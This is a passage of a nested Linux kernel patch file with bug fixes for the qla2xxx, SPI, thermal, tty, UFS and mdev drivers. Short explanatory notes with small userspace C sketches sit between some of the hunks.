+--- a/drivers/scsi/qla2xxx/qla_def.h
++++ b/drivers/scsi/qla2xxx/qla_def.h
+@@ -3475,6 +3475,7 @@ struct qla_msix_entry {
+ 	int have_irq;
+ 	int in_use;
+ 	uint32_t vector;
++	uint32_t vector_base0;
+ 	uint16_t entry;
+ 	char name[30];
+ 	void *handle;
+@@ -3804,6 +3805,7 @@ struct qla_qpair {
+ 	uint64_t retry_term_jiff;
+ 	struct qla_tgt_counters tgt_counters;
+ 	uint16_t cpuid;
++	bool cpu_mapped;
+ 	struct qla_fw_resources fwres ____cacheline_aligned;
+ 	u32	cmd_cnt;
+ 	u32	cmd_completion_cnt;
+@@ -4133,6 +4135,7 @@ struct qla_hw_data {
+ 	struct req_que **req_q_map;
+ 	struct rsp_que **rsp_q_map;
+ 	struct qla_qpair **queue_pair_map;
++	struct qla_qpair **qp_cpu_map;
+ 	unsigned long req_qid_map[(QLA_MAX_QUEUES / 8) / sizeof(unsigned long)];
+ 	unsigned long rsp_qid_map[(QLA_MAX_QUEUES / 8) / sizeof(unsigned long)];
+ 	unsigned long qpair_qid_map[(QLA_MAX_QUEUES / 8)
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index 36abdb0de1694..884ed77259f85 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -9758,8 +9758,9 @@ struct qla_qpair *qla2xxx_create_qpair(struct scsi_qla_host *vha, int qos,
+ 		qpair->req = ha->req_q_map[req_id];
+ 		qpair->rsp->req = qpair->req;
+ 		qpair->rsp->qpair = qpair;
+-		/* init qpair to this cpu. Will adjust at run time. */
+-		qla_cpu_update(qpair, raw_smp_processor_id());
++
++		if (!qpair->cpu_mapped)
++			qla_cpu_update(qpair, raw_smp_processor_id());
+ 
+ 		if (IS_T10_PI_CAPABLE(ha) && ql2xenabledif) {
+ 			if (ha->fw_attributes & BIT_4)
+diff --git a/drivers/scsi/qla2xxx/qla_inline.h b/drivers/scsi/qla2xxx/qla_inline.h
+index a7b5d11146827..a4a56ab0ba747 100644
+--- a/drivers/scsi/qla2xxx/qla_inline.h
++++ b/drivers/scsi/qla2xxx/qla_inline.h
+@@ -573,3 +573,61 @@ fcport_is_bigger(fc_port_t *fcport)
+ {
+ 	return !fcport_is_smaller(fcport);
+ }
++
++static inline struct qla_qpair *
++qla_mapq_nvme_select_qpair(struct qla_hw_data *ha, struct qla_qpair *qpair)
++{
++	int cpuid = raw_smp_processor_id();
++
++	if (qpair->cpuid != cpuid &&
++	    ha->qp_cpu_map[cpuid]) {
++		qpair = ha->qp_cpu_map[cpuid];
++	}
++	return qpair;
++}
++
++static inline void
++qla_mapq_init_qp_cpu_map(struct qla_hw_data *ha,
++			 struct qla_msix_entry *msix,
++			 struct qla_qpair *qpair)
++{
++	const struct cpumask *mask;
++	unsigned int cpu;
++
++	if (!ha->qp_cpu_map)
++		return;
++	mask = pci_irq_get_affinity(ha->pdev, msix->vector_base0);
++	if (!mask)
++		return;
++	qpair->cpuid = cpumask_first(mask);
++	for_each_cpu(cpu, mask) {
++		ha->qp_cpu_map[cpu] = qpair;
++	}
++	msix->cpuid = qpair->cpuid;
++	qpair->cpu_mapped = true;
++}
++
++static inline void
++qla_mapq_free_qp_cpu_map(struct qla_hw_data *ha)
++{
++	if (ha->qp_cpu_map) {
++		kfree(ha->qp_cpu_map);
++		ha->qp_cpu_map = NULL;
++	}
++}
++
++static inline int qla_mapq_alloc_qp_cpu_map(struct qla_hw_data *ha)
++{
++	scsi_qla_host_t *vha = pci_get_drvdata(ha->pdev);
++
++	if (!ha->qp_cpu_map) {
++		ha->qp_cpu_map = kcalloc(NR_CPUS, sizeof(struct qla_qpair *),
++					 GFP_KERNEL);
++		if (!ha->qp_cpu_map) {
++			ql_log(ql_log_fatal, vha, 0x0180,
++			       "Unable to allocate memory for qp_cpu_map ptrs.\n");
++			return -1;
++		}
++	}
++	return 0;
++}
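
For context: the qla_mapq_* helpers added above build a per-CPU lookup table from MSI-X vector affinity and steer NVMe submissions to the queue pair owned by the submitting CPU, falling back to the caller's qpair when no mapping exists. A minimal userspace sketch of the lookup side (the array size and names are illustrative, not taken from the driver):

#include <stdio.h>

#define NR_CPUS 8

struct qpair { int id; int cpuid; };

static struct qpair *qp_cpu_map[NR_CPUS];

/* Prefer the qpair whose IRQ is affined to @cpu; otherwise keep the
 * caller's qpair. Mirrors the shape of qla_mapq_nvme_select_qpair(). */
static struct qpair *select_qpair(struct qpair *qpair, int cpu)
{
	if (qpair->cpuid != cpu && qp_cpu_map[cpu])
		return qp_cpu_map[cpu];
	return qpair;
}

int main(void)
{
	struct qpair q0 = { .id = 0, .cpuid = 0 };
	struct qpair q1 = { .id = 1, .cpuid = 4 };

	qp_cpu_map[0] = &q0;
	qp_cpu_map[4] = &q1;

	/* A command submitted on CPU 4 while holding q0 is steered to q1. */
	printf("selected qpair %d\n", select_qpair(&q0, 4)->id);
	return 0;
}

In the driver the map is filled per MSI-X vector from pci_irq_get_affinity(), so every CPU in a vector's mask points at that vector's qpair.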
+diff --git a/drivers/scsi/qla2xxx/qla_isr.c b/drivers/scsi/qla2xxx/qla_isr.c
+index 0111249cc8774..db65dbab3a9fa 100644
+--- a/drivers/scsi/qla2xxx/qla_isr.c
++++ b/drivers/scsi/qla2xxx/qla_isr.c
+@@ -3817,9 +3817,11 @@ void qla24xx_process_response_queue(struct scsi_qla_host *vha,
+ 	if (!ha->flags.fw_started)
+ 		return;
+ 
+-	if (rsp->qpair->cpuid != smp_processor_id() || !rsp->qpair->rcv_intr) {
++	if (rsp->qpair->cpuid != raw_smp_processor_id() || !rsp->qpair->rcv_intr) {
+ 		rsp->qpair->rcv_intr = 1;
+-		qla_cpu_update(rsp->qpair, smp_processor_id());
++
++		if (!rsp->qpair->cpu_mapped)
++			qla_cpu_update(rsp->qpair, raw_smp_processor_id());
+ 	}
+ 
+ #define __update_rsp_in(_is_shadow_hba, _rsp, _rsp_in)			\
+@@ -4306,7 +4308,7 @@ qla2xxx_msix_rsp_q(int irq, void *dev_id)
+ 	}
+ 	ha = qpair->hw;
+ 
+-	queue_work_on(smp_processor_id(), ha->wq, &qpair->q_work);
++	queue_work(ha->wq, &qpair->q_work);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -4332,7 +4334,7 @@ qla2xxx_msix_rsp_q_hs(int irq, void *dev_id)
+ 	wrt_reg_dword(&reg->hccr, HCCRX_CLR_RISC_INT);
+ 	spin_unlock_irqrestore(&ha->hardware_lock, flags);
+ 
+-	queue_work_on(smp_processor_id(), ha->wq, &qpair->q_work);
++	queue_work(ha->wq, &qpair->q_work);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -4425,6 +4427,7 @@ qla24xx_enable_msix(struct qla_hw_data *ha, struct rsp_que *rsp)
+ 	for (i = 0; i < ha->msix_count; i++) {
+ 		qentry = &ha->msix_entries[i];
+ 		qentry->vector = pci_irq_vector(ha->pdev, i);
++		qentry->vector_base0 = i;
+ 		qentry->entry = i;
+ 		qentry->have_irq = 0;
+ 		qentry->in_use = 0;
+@@ -4652,5 +4655,6 @@ int qla25xx_request_irq(struct qla_hw_data *ha, struct qla_qpair *qpair,
+ 	}
+ 	msix->have_irq = 1;
+ 	msix->handle = qpair;
++	qla_mapq_init_qp_cpu_map(ha, msix, qpair);
+ 	return ret;
+ }
+diff --git a/drivers/scsi/qla2xxx/qla_nvme.c b/drivers/scsi/qla2xxx/qla_nvme.c
+index c9a6fc882a801..9941b38eac93c 100644
+--- a/drivers/scsi/qla2xxx/qla_nvme.c
++++ b/drivers/scsi/qla2xxx/qla_nvme.c
+@@ -609,6 +609,7 @@ static int qla_nvme_post_cmd(struct nvme_fc_local_port *lport,
+ 	fc_port_t *fcport;
+ 	struct srb_iocb *nvme;
+ 	struct scsi_qla_host *vha;
++	struct qla_hw_data *ha;
+ 	int rval;
+ 	srb_t *sp;
+ 	struct qla_qpair *qpair = hw_queue_handle;
+@@ -629,6 +630,7 @@ static int qla_nvme_post_cmd(struct nvme_fc_local_port *lport,
+ 		return -ENODEV;
+ 
+ 	vha = fcport->vha;
++	ha = vha->hw;
+ 
+ 	if (test_bit(ABORT_ISP_ACTIVE, &vha->dpc_flags))
+ 		return -EBUSY;
+@@ -643,6 +645,8 @@ static int qla_nvme_post_cmd(struct nvme_fc_local_port *lport,
+ 	if (fcport->nvme_flag & NVME_FLAG_RESETTING)
+ 		return -EBUSY;
+ 
++	qpair = qla_mapq_nvme_select_qpair(ha, qpair);
++
+ 	/* Alloc SRB structure */
+ 	sp = qla2xxx_get_qpair_sp(vha, qpair, fcport, GFP_ATOMIC);
+ 	if (!sp)
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 78f7cd16967fa..b33ffec1cb75e 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -480,6 +480,11 @@ static int qla2x00_alloc_queues(struct qla_hw_data *ha, struct req_que *req,
+ 			    "Unable to allocate memory for queue pair ptrs.\n");
+ 			goto fail_qpair_map;
+ 		}
++		if (qla_mapq_alloc_qp_cpu_map(ha) != 0) {
++			kfree(ha->queue_pair_map);
++			ha->queue_pair_map = NULL;
++			goto fail_qpair_map;
++		}
+ 	}
+ 
+ 	/*
+@@ -554,6 +559,7 @@ static void qla2x00_free_queues(struct qla_hw_data *ha)
+ 		ha->base_qpair = NULL;
+ 	}
+ 
++	qla_mapq_free_qp_cpu_map(ha);
+ 	spin_lock_irqsave(&ha->hardware_lock, flags);
+ 	for (cnt = 0; cnt < ha->max_req_queues; cnt++) {
+ 		if (!test_bit(cnt, ha->req_qid_map))
+diff --git a/drivers/scsi/qla2xxx/qla_target.c b/drivers/scsi/qla2xxx/qla_target.c
+index 545473a0ffc84..5a5beb41786ed 100644
+--- a/drivers/scsi/qla2xxx/qla_target.c
++++ b/drivers/scsi/qla2xxx/qla_target.c
+@@ -4442,8 +4442,7 @@ static int qlt_handle_cmd_for_atio(struct scsi_qla_host *vha,
+ 		queue_work_on(cmd->se_cmd.cpuid, qla_tgt_wq, &cmd->work);
+ 	} else if (ha->msix_count) {
+ 		if (cmd->atio.u.isp24.fcp_cmnd.rddata)
+-			queue_work_on(smp_processor_id(), qla_tgt_wq,
+-			    &cmd->work);
++			queue_work(qla_tgt_wq, &cmd->work);
+ 		else
+ 			queue_work_on(cmd->se_cmd.cpuid, qla_tgt_wq,
+ 			    &cmd->work);
+diff --git a/drivers/scsi/qla2xxx/tcm_qla2xxx.c b/drivers/scsi/qla2xxx/tcm_qla2xxx.c
+index 8fa0056b56ddb..e54ee6770e79f 100644
+--- a/drivers/scsi/qla2xxx/tcm_qla2xxx.c
++++ b/drivers/scsi/qla2xxx/tcm_qla2xxx.c
+@@ -310,7 +310,7 @@ static void tcm_qla2xxx_free_cmd(struct qla_tgt_cmd *cmd)
+ 	cmd->trc_flags |= TRC_CMD_DONE;
+ 
+ 	INIT_WORK(&cmd->work, tcm_qla2xxx_complete_free);
+-	queue_work_on(smp_processor_id(), tcm_qla2xxx_free_wq, &cmd->work);
++	queue_work(tcm_qla2xxx_free_wq, &cmd->work);
+ }
+ 
+ /*
+@@ -557,7 +557,7 @@ static void tcm_qla2xxx_handle_data(struct qla_tgt_cmd *cmd)
+ 	cmd->trc_flags |= TRC_DATA_IN;
+ 	cmd->cmd_in_wq = 1;
+ 	INIT_WORK(&cmd->work, tcm_qla2xxx_handle_data_work);
+-	queue_work_on(smp_processor_id(), tcm_qla2xxx_free_wq, &cmd->work);
++	queue_work(tcm_qla2xxx_free_wq, &cmd->work);
+ }
+ 
+ static int tcm_qla2xxx_chk_dif_tags(uint32_t tag)
+diff --git a/drivers/soc/imx/soc-imx8m.c b/drivers/soc/imx/soc-imx8m.c
+index 32ed9dc88e455..08197b03955dd 100644
+--- a/drivers/soc/imx/soc-imx8m.c
++++ b/drivers/soc/imx/soc-imx8m.c
+@@ -100,6 +100,7 @@ static void __init imx8mm_soc_uid(void)
+ {
+ 	void __iomem *ocotp_base;
+ 	struct device_node *np;
++	struct clk *clk;
+ 	u32 offset = of_machine_is_compatible("fsl,imx8mp") ?
+ 		     IMX8MP_OCOTP_UID_OFFSET : 0;
+ 
+@@ -109,11 +110,20 @@ static void __init imx8mm_soc_uid(void)
+ 
+ 	ocotp_base = of_iomap(np, 0);
+ 	WARN_ON(!ocotp_base);
++	clk = of_clk_get_by_name(np, NULL);
++	if (IS_ERR(clk)) {
++		WARN_ON(IS_ERR(clk));
++		return;
++	}
++
++	clk_prepare_enable(clk);
+ 
+ 	soc_uid = readl_relaxed(ocotp_base + OCOTP_UID_HIGH + offset);
+ 	soc_uid <<= 32;
+ 	soc_uid |= readl_relaxed(ocotp_base + OCOTP_UID_LOW + offset);
+ 
++	clk_disable_unprepare(clk);
++	clk_put(clk);
+ 	iounmap(ocotp_base);
+ 	of_node_put(np);
+ }
+diff --git a/drivers/spi/spi-gxp.c b/drivers/spi/spi-gxp.c
+index c900c2f39b578..21b07e2518513 100644
+--- a/drivers/spi/spi-gxp.c
++++ b/drivers/spi/spi-gxp.c
+@@ -195,7 +195,7 @@ static ssize_t gxp_spi_write(struct gxp_spi_chip *chip, const struct spi_mem_op
+ 		return ret;
+ 	}
+ 
+-	return write_len;
++	return 0;
+ }
+ 
+ static int do_gxp_exec_mem_op(struct spi_mem *mem, const struct spi_mem_op *op)
+diff --git a/drivers/spi/spi-intel-pci.c b/drivers/spi/spi-intel-pci.c
+index f0d532ea40e82..b718a74fa3edc 100644
+--- a/drivers/spi/spi-intel-pci.c
++++ b/drivers/spi/spi-intel-pci.c
+@@ -72,6 +72,7 @@ static const struct pci_device_id intel_spi_pci_ids[] = {
+ 	{ PCI_VDEVICE(INTEL, 0x4da4), (unsigned long)&bxt_info },
+ 	{ PCI_VDEVICE(INTEL, 0x51a4), (unsigned long)&cnl_info },
+ 	{ PCI_VDEVICE(INTEL, 0x54a4), (unsigned long)&cnl_info },
++	{ PCI_VDEVICE(INTEL, 0x5794), (unsigned long)&cnl_info },
+ 	{ PCI_VDEVICE(INTEL, 0x7a24), (unsigned long)&cnl_info },
+ 	{ PCI_VDEVICE(INTEL, 0x7aa4), (unsigned long)&cnl_info },
+ 	{ PCI_VDEVICE(INTEL, 0x7e23), (unsigned long)&cnl_info },
+diff --git a/drivers/spi/spi-nxp-fspi.c b/drivers/spi/spi-nxp-fspi.c
+index d6a65a989ef80..c7a4a3606547e 100644
+--- a/drivers/spi/spi-nxp-fspi.c
++++ b/drivers/spi/spi-nxp-fspi.c
+@@ -1029,6 +1029,13 @@ static int nxp_fspi_default_setup(struct nxp_fspi *f)
+ 	fspi_writel(f, FSPI_AHBCR_PREF_EN | FSPI_AHBCR_RDADDROPT,
+ 		 base + FSPI_AHBCR);
+ 
++	/* Reset the FLSHxCR1 registers. */
++	reg = FSPI_FLSHXCR1_TCSH(0x3) | FSPI_FLSHXCR1_TCSS(0x3);
++	fspi_writel(f, reg, base + FSPI_FLSHA1CR1);
++	fspi_writel(f, reg, base + FSPI_FLSHA2CR1);
++	fspi_writel(f, reg, base + FSPI_FLSHB1CR1);
++	fspi_writel(f, reg, base + FSPI_FLSHB2CR1);
++
+ 	/* AHB Read - Set lut sequence ID for all CS. */
+ 	fspi_writel(f, SEQID_LUT, base + FSPI_FLSHA1CR2);
+ 	fspi_writel(f, SEQID_LUT, base + FSPI_FLSHA2CR2);
+diff --git a/drivers/spi/spi-stm32.c b/drivers/spi/spi-stm32.c
+index def09cf0dc147..12241815510d4 100644
+--- a/drivers/spi/spi-stm32.c
++++ b/drivers/spi/spi-stm32.c
+@@ -268,6 +268,7 @@ struct stm32_spi_cfg {
+  * @fifo_size: size of the embedded fifo in bytes
+  * @cur_midi: master inter-data idleness in ns
+  * @cur_speed: speed configured in Hz
++ * @cur_half_period: time of a half bit in us
+  * @cur_bpw: number of bits in a single SPI data frame
+  * @cur_fthlv: fifo threshold level (data frames in a single data packet)
+  * @cur_comm: SPI communication mode
+@@ -294,6 +295,7 @@ struct stm32_spi {
+ 
+ 	unsigned int cur_midi;
+ 	unsigned int cur_speed;
++	unsigned int cur_half_period;
+ 	unsigned int cur_bpw;
+ 	unsigned int cur_fthlv;
+ 	unsigned int cur_comm;
+@@ -454,6 +456,8 @@ static int stm32_spi_prepare_mbr(struct stm32_spi *spi, u32 speed_hz,
+ 
+ 	spi->cur_speed = spi->clk_rate / (1 << mbrdiv);
+ 
++	spi->cur_half_period = DIV_ROUND_CLOSEST(USEC_PER_SEC, 2 * spi->cur_speed);
++
+ 	return mbrdiv - 1;
+ }
+ 
+@@ -695,6 +699,10 @@ static void stm32h7_spi_disable(struct stm32_spi *spi)
+ 		return;
+ 	}
+ 
++	/* Add a delay to make sure that transmission is ended. */
++	if (spi->cur_half_period)
++		udelay(spi->cur_half_period);
++
+ 	if (spi->cur_usedma && spi->dma_tx)
+ 		dmaengine_terminate_all(spi->dma_tx);
+ 	if (spi->cur_usedma && spi->dma_rx)
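
The stm32 change computes one half SCK period in microseconds when the speed is programmed and busy-waits that long before disabling the controller, so the last bit is fully clocked out. The arithmetic in isolation, as a runnable sketch:

#include <stdio.h>

#define USEC_PER_SEC 1000000U

/* Round-to-nearest division, as the kernel's DIV_ROUND_CLOSEST()
 * does for unsigned operands. */
static unsigned int div_round_closest(unsigned int x, unsigned int d)
{
	return (x + d / 2) / d;
}

int main(void)
{
	unsigned int speeds[] = { 187500, 1000000, 24000000 };

	for (int i = 0; i < 3; i++)
		printf("%u Hz -> half period %u us\n", speeds[i],
		       div_round_closest(USEC_PER_SEC, 2 * speeds[i]));
	return 0;
}

Note that fast clocks round down to 0 us, and the patch guards the udelay() with `if (spi->cur_half_period)`, so no delay is added where a microsecond granularity cannot express one.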
+diff --git a/drivers/spi/spi-sun6i.c b/drivers/spi/spi-sun6i.c
+index 23ad052528dbe..d79853ba7792a 100644
+--- a/drivers/spi/spi-sun6i.c
++++ b/drivers/spi/spi-sun6i.c
+@@ -95,6 +95,7 @@ struct sun6i_spi {
+ 	struct reset_control	*rstc;
+ 
+ 	struct completion	done;
++	struct completion	dma_rx_done;
+ 
+ 	const u8		*tx_buf;
+ 	u8			*rx_buf;
+@@ -189,6 +190,13 @@ static size_t sun6i_spi_max_transfer_size(struct spi_device *spi)
+ 	return SUN6I_MAX_XFER_SIZE - 1;
+ }
+ 
++static void sun6i_spi_dma_rx_cb(void *param)
++{
++	struct sun6i_spi *sspi = param;
++
++	complete(&sspi->dma_rx_done);
++}
++
+ static int sun6i_spi_prepare_dma(struct sun6i_spi *sspi,
+ 				 struct spi_transfer *tfr)
+ {
+@@ -200,7 +208,7 @@ static int sun6i_spi_prepare_dma(struct sun6i_spi *sspi,
+ 		struct dma_slave_config rxconf = {
+ 			.direction = DMA_DEV_TO_MEM,
+ 			.src_addr = sspi->dma_addr_rx,
+-			.src_addr_width = DMA_SLAVE_BUSWIDTH_4_BYTES,
++			.src_addr_width = DMA_SLAVE_BUSWIDTH_1_BYTE,
+ 			.src_maxburst = 8,
+ 		};
+ 
+@@ -213,6 +221,8 @@ static int sun6i_spi_prepare_dma(struct sun6i_spi *sspi,
+ 						 DMA_PREP_INTERRUPT);
+ 		if (!rxdesc)
+ 			return -EINVAL;
++		rxdesc->callback_param = sspi;
++		rxdesc->callback = sun6i_spi_dma_rx_cb;
+ 	}
+ 
+ 	txdesc = NULL;
+@@ -268,6 +278,7 @@ static int sun6i_spi_transfer_one(struct spi_master *master,
+ 		return -EINVAL;
+ 
+ 	reinit_completion(&sspi->done);
++	reinit_completion(&sspi->dma_rx_done);
+ 	sspi->tx_buf = tfr->tx_buf;
+ 	sspi->rx_buf = tfr->rx_buf;
+ 	sspi->len = tfr->len;
+@@ -426,6 +437,22 @@ static int sun6i_spi_transfer_one(struct spi_master *master,
+ 	start = jiffies;
+ 	timeout = wait_for_completion_timeout(&sspi->done,
+ 					      msecs_to_jiffies(tx_time));
++
++	if (!use_dma) {
++		sun6i_spi_drain_fifo(sspi);
++	} else {
++		if (timeout && rx_len) {
++			/*
++			 * Even though RX on the peripheral side has finished
++			 * RX DMA might still be in flight
++			 */
++			timeout = wait_for_completion_timeout(&sspi->dma_rx_done,
++							      timeout);
++			if (!timeout)
++				dev_warn(&master->dev, "RX DMA timeout\n");
++		}
++	}
++
+ 	end = jiffies;
+ 	if (!timeout) {
+ 		dev_warn(&master->dev,
+@@ -453,7 +480,6 @@ static irqreturn_t sun6i_spi_handler(int irq, void *dev_id)
+ 	/* Transfer complete */
+ 	if (status & SUN6I_INT_CTL_TC) {
+ 		sun6i_spi_write(sspi, SUN6I_INT_STA_REG, SUN6I_INT_CTL_TC);
+-		sun6i_spi_drain_fifo(sspi);
+ 		complete(&sspi->done);
+ 		return IRQ_HANDLED;
+ 	}
+@@ -611,6 +637,7 @@ static int sun6i_spi_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	init_completion(&sspi->done);
++	init_completion(&sspi->dma_rx_done);
+ 
+ 	sspi->rstc = devm_reset_control_get_exclusive(&pdev->dev, NULL);
+ 	if (IS_ERR(sspi->rstc)) {
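
The sun6i fix splits completion into two independent events, the controller's transfer-complete interrupt and the RX DMA descriptor callback, and the transfer path now waits on both before the buffer is considered valid. A tiny single-threaded model of the two-flag handshake (the driver uses struct completion; names here are invented):

#include <stdbool.h>
#include <stdio.h>

static bool xfer_done, dma_rx_done;

static void irq_transfer_complete(void) { xfer_done = true; }
static void dma_rx_callback(void)       { dma_rx_done = true; }

/* The RX buffer is only safe to read once *both* events have fired;
 * waiting on the interrupt alone races with in-flight DMA writes. */
static bool rx_buffer_ready(void)
{
	return xfer_done && dma_rx_done;
}

int main(void)
{
	irq_transfer_complete();
	printf("after IRQ only: ready=%d\n", rx_buffer_ready());
	dma_rx_callback();
	printf("after DMA cb:   ready=%d\n", rx_buffer_ready());
	return 0;
}

This is also why the FIFO drain moved out of the interrupt handler: in DMA mode the IRQ can fire while the DMA engine still owns the data.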
+diff --git a/drivers/thermal/thermal_of.c b/drivers/thermal/thermal_of.c
+index 762d1990180bf..4104743dbc17e 100644
+--- a/drivers/thermal/thermal_of.c
++++ b/drivers/thermal/thermal_of.c
+@@ -149,8 +149,10 @@ static int of_find_trip_id(struct device_node *np, struct device_node *trip)
+ 	 */
+ 	for_each_child_of_node(trips, t) {
+ 
+-		if (t == trip)
++		if (t == trip) {
++			of_node_put(t);
+ 			goto out;
++		}
+ 		i++;
+ 	}
+ 
+@@ -519,8 +521,10 @@ static int thermal_of_for_each_cooling_maps(struct thermal_zone_device *tz,
+ 
+ 	for_each_child_of_node(cm_np, child) {
+ 		ret = thermal_of_for_each_cooling_device(tz_np, child, tz, cdev, action);
+-		if (ret)
++		if (ret) {
++			of_node_put(child);
+ 			break;
++		}
+ 	}
+ 
+ 	of_node_put(cm_np);
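
Both thermal_of hunks fix the same refcounting rule: for_each_child_of_node() takes a reference on the child it yields and drops the previous one, so leaving the loop early must drop the current child's reference by hand. A toy refcount model of the early-exit path (illustrative types, not the OF API):

#include <stdio.h>

struct node { const char *name; int refcount; };

static struct node *node_get(struct node *n) { n->refcount++; return n; }
static void node_put(struct node *n)         { n->refcount--; }

int main(void)
{
	struct node kids[3] = { {"a", 1}, {"b", 1}, {"c", 1} };

	/* Iterator convention: each step takes a ref on the next child
	 * and drops the previous one, like for_each_child_of_node(). */
	for (int i = 0; i < 3; i++) {
		struct node *child = node_get(&kids[i]);
		if (i > 0)
			node_put(&kids[i - 1]);

		if (i == 1) {            /* early exit mid-walk... */
			node_put(child); /* ...must drop the held ref */
			break;
		}
	}

	for (int i = 0; i < 3; i++)
		printf("%s refcount=%d\n", kids[i].name, kids[i].refcount);
	return 0;
}

Without the explicit put, node "b" would leak a reference on the break, which is exactly what the added of_node_put() calls prevent.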
+diff --git a/drivers/tty/n_gsm.c b/drivers/tty/n_gsm.c
+index c1fa20a4e3420..4b43589304704 100644
+--- a/drivers/tty/n_gsm.c
++++ b/drivers/tty/n_gsm.c
+@@ -2509,10 +2509,8 @@ static void gsm_cleanup_mux(struct gsm_mux *gsm, bool disc)
+ 		gsm->has_devices = false;
+ 	}
+ 	for (i = NUM_DLCI - 1; i >= 0; i--)
+-		if (gsm->dlci[i]) {
++		if (gsm->dlci[i])
+ 			gsm_dlci_release(gsm->dlci[i]);
+-			gsm->dlci[i] = NULL;
+-		}
+ 	mutex_unlock(&gsm->mutex);
+ 	/* Now wipe the queues */
+ 	tty_ldisc_flush(gsm->tty);
+diff --git a/drivers/tty/serial/8250/8250_port.c b/drivers/tty/serial/8250/8250_port.c
+index 38760bd6e0c29..8efe31448df3c 100644
+--- a/drivers/tty/serial/8250/8250_port.c
++++ b/drivers/tty/serial/8250/8250_port.c
+@@ -1953,7 +1953,10 @@ int serial8250_handle_irq(struct uart_port *port, unsigned int iir)
+ 		skip_rx = true;
+ 
+ 	if (status & (UART_LSR_DR | UART_LSR_BI) && !skip_rx) {
+-		if (irqd_is_wakeup_set(irq_get_irq_data(port->irq)))
++		struct irq_data *d;
++
++		d = irq_get_irq_data(port->irq);
++		if (d && irqd_is_wakeup_set(d))
+ 			pm_wakeup_event(tport->tty->dev, 0);
+ 		if (!up->dma || handle_rx_dma(up, iir))
+ 			status = serial8250_rx_chars(up, status);
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index 36437d39b93c8..b4e3f14b9a3d7 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -22,6 +22,7 @@
+ #include <linux/module.h>
+ #include <linux/regulator/consumer.h>
+ #include <linux/sched/clock.h>
++#include <linux/iopoll.h>
+ #include <scsi/scsi_cmnd.h>
+ #include <scsi/scsi_dbg.h>
+ #include <scsi/scsi_driver.h>
+@@ -2254,7 +2255,11 @@ static inline int ufshcd_hba_capabilities(struct ufs_hba *hba)
+  */
+ static inline bool ufshcd_ready_for_uic_cmd(struct ufs_hba *hba)
+ {
+-	return ufshcd_readl(hba, REG_CONTROLLER_STATUS) & UIC_COMMAND_READY;
++	u32 val;
++	int ret = read_poll_timeout(ufshcd_readl, val, val & UIC_COMMAND_READY,
++				    500, UIC_CMD_TIMEOUT * 1000, false, hba,
++				    REG_CONTROLLER_STATUS);
++	return ret == 0 ? true : false;
+ }
+ 
+ /**
+@@ -2346,7 +2351,6 @@ __ufshcd_send_uic_cmd(struct ufs_hba *hba, struct uic_command *uic_cmd,
+ 		      bool completion)
+ {
+ 	lockdep_assert_held(&hba->uic_cmd_mutex);
+-	lockdep_assert_held(hba->host->host_lock);
+ 
+ 	if (!ufshcd_ready_for_uic_cmd(hba)) {
+ 		dev_err(hba->dev,
+@@ -2373,7 +2377,6 @@ __ufshcd_send_uic_cmd(struct ufs_hba *hba, struct uic_command *uic_cmd,
+ int ufshcd_send_uic_cmd(struct ufs_hba *hba, struct uic_command *uic_cmd)
+ {
+ 	int ret;
+-	unsigned long flags;
+ 
+ 	if (hba->quirks & UFSHCD_QUIRK_BROKEN_UIC_CMD)
+ 		return 0;
+@@ -2382,9 +2385,7 @@ int ufshcd_send_uic_cmd(struct ufs_hba *hba, struct uic_command *uic_cmd)
+ 	mutex_lock(&hba->uic_cmd_mutex);
+ 	ufshcd_add_delay_before_dme_cmd(hba);
+ 
+-	spin_lock_irqsave(hba->host->host_lock, flags);
+ 	ret = __ufshcd_send_uic_cmd(hba, uic_cmd, true);
+-	spin_unlock_irqrestore(hba->host->host_lock, flags);
+ 	if (!ret)
+ 		ret = ufshcd_wait_for_uic_cmd(hba, uic_cmd);
+ 
+@@ -4076,8 +4077,8 @@ static int ufshcd_uic_pwr_ctrl(struct ufs_hba *hba, struct uic_command *cmd)
+ 		wmb();
+ 		reenable_intr = true;
+ 	}
+-	ret = __ufshcd_send_uic_cmd(hba, cmd, false);
+ 	spin_unlock_irqrestore(hba->host->host_lock, flags);
++	ret = __ufshcd_send_uic_cmd(hba, cmd, false);
+ 	if (ret) {
+ 		dev_err(hba->dev,
+ 			"pwr ctrl cmd 0x%x with mode 0x%x uic error %d\n",
+diff --git a/drivers/vfio/mdev/mdev_sysfs.c b/drivers/vfio/mdev/mdev_sysfs.c
+index abe3359dd477f..16b007c6bbb56 100644
+--- a/drivers/vfio/mdev/mdev_sysfs.c
++++ b/drivers/vfio/mdev/mdev_sysfs.c
+@@ -233,7 +233,8 @@ int parent_create_sysfs_files(struct mdev_parent *parent)
+ out_err:
+ 	while (--i >= 0)
+ 		mdev_type_remove(parent->types[i]);
+-	return 0;
++	kset_unregister(parent->mdev_types_kset);
++	return ret;
+ }
+ 
+ static ssize_t remove_store(struct device *dev, struct device_attribute *attr,
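
The mdev fix makes the error path both tear down what was created and return the saved errno; previously it unwound the types yet reported success. The general pattern, undo in reverse order and propagate the failure, as a small sketch with invented helpers:

#include <stdio.h>

static int created[4];

static int create_one(int i)
{
	if (i == 2)
		return -1;	/* simulate a mid-loop failure */
	created[i] = 1;
	return 0;
}

static void destroy_one(int i) { created[i] = 0; }

static int create_all(int n)
{
	int ret = 0, i;

	for (i = 0; i < n; i++) {
		ret = create_one(i);
		if (ret)
			goto out_err;
	}
	return 0;

out_err:
	/* Unwind only what was created, in reverse, and report the
	 * real error: returning 0 here would hide the failure. */
	while (--i >= 0)
		destroy_one(i);
	return ret;
}

int main(void)
{
	printf("create_all: %d\n", create_all(4));
	return 0;
}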
+diff --git a/drivers/video/fbdev/Kconfig b/drivers/video/fbdev/Kconfig
+index 974e862cd20d6..ff95f19224901 100644
+--- a/drivers/video/fbdev/Kconfig
++++ b/drivers/video/fbdev/Kconfig
